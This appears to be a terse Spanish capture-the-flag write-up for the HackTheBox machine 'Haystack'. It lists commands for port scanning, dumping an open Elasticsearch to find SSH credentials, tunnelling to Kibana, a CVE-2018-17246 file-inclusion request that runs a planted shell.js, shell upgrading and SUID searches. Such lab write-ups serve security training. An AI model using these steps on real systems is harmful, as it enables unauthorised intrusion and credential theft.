# Haystack ~~~ nmap -sS -Pn --min-rate 5000 10.10.10.115 -oG allPorts ~~~  ### Puerto 80    ~~~ exiftool index.jpeg ~~~  ~~~ strings index.jpeg ~~~   ### Puerto 9200  ~~~ curl -s -X GET "http://10.10.10.115:9200/_cluster" curl -s -X GET "http://10.10.10.115:9200/_security" curl -s -X GET "http://10.10.10.115:9200/_cat" curl -s -X GET "10.10.10.115:9200/_cat" ; echo ~~~  ~~~ curl -s -X GET "http://10.10.10.115:9200/_cat/indices?v" ; echo ~~~  ~~~ curl -s -X GET "http://10.10.10.115:9200/quotes" | jq ~~~  ~~~ curl -s -X GET "http://10.10.10.115:9200/bank/_search?pretty=true" | jq ~~~  ~~~ curl -s -X GET "http://10.10.10.115:9200/quotes/_search?pretty=true&size=10000" | jq | grep "clave" ~~~   security spanish.is.key ### Puerto 22  ## Reconocimiento dentro del objetivo #### Puertos abiertos en la máquina ~~~ netstat -nat ss -nltp ~~~  #### 5601 - Kibana  #### Local Port Forwarding Antes:  Ahora: ~~~ ssh security@10.10.10.115 -L 5601:localhost:5601 ~~~   ### Kibana  #### CVE-2018-17246     ~~~ curl -s -X GET "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/shell.js" ~~~ #### STTY ~~~ python -c 'import pty;pty.spawn("/bin/bash")' ~~~  ### Busqueda de archivos ~~~ find \-perm -4000 2>/dev/null find / -user kibana 2>/dev/null ~~~  Archivos que ejecuta root:    
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up